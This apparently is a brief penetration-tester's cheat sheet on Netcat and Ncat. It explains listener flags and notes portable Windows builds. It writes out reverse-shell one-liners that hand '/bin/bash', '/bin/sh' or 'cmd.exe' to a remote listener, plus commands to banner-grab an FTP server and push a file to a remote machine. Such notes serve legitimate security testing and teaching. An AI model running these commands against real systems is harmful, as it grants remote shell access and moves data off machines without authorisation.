NetCat is a popular remote access tool.

• It has a small footprint so it's portable.
• It can set up a reverse shell easily…

Local listener for reverse shell:

nc -nvlp [port number]
# -n  numeric-only IP addresses, no DNS
# -v  verbose (twice for more verbose)
# -l  listen mode, for inbound connects
# -p  port number

Connect to that listener:

# For Linux (either or):
nc [listener IP] [port] –e /bin/bash
nc [listener IP] [port] –e /bin/sh

# For Windows:
nc.exe [listener IP] [port] –e cmd.exe

Connect to FTP port (21) to check version of FTP server:

nc [target IP] 21

Send output from a listener to a text file:

nc -nvlp [port number] > filename.txt

Send output from a text file to a remote machine:

nc [IP Address] [port] < filename.txt

Initial: netcat 1.11 compiled for both 32 and 64-bit Windows.

Update: netcat 1.12 adds -c command-line option to send CRLF line endings instead of just CR (eg. to talk to Exchange SMTP)

I used 1.12 on Windows 7 and it was drop-and-use.

• Dropped the zip into Winders, unzipped, reverse shell back to my Kali box.
• No tweaking necessary.

Source: eternallybored.org (much thanks)

Ncat is a much-improved reimplementation of the Netcat.

• I has a variety of different capabilities…
• SSL
• Proxies
• SendMail
• Chain together Ncat sessions for pivoting.

If you need a statically compiled version of ncat.exe that you can just drop on a Windows system and use without having to run any installer or copy over extra library files: Ncat 5.59BETA1 ( local download )

To ensure the file hasn't been tampered with, you can check the cryptographic signatures .

If you need a portable version of a newer Ncat release, see the Ncat portable compilation instructions.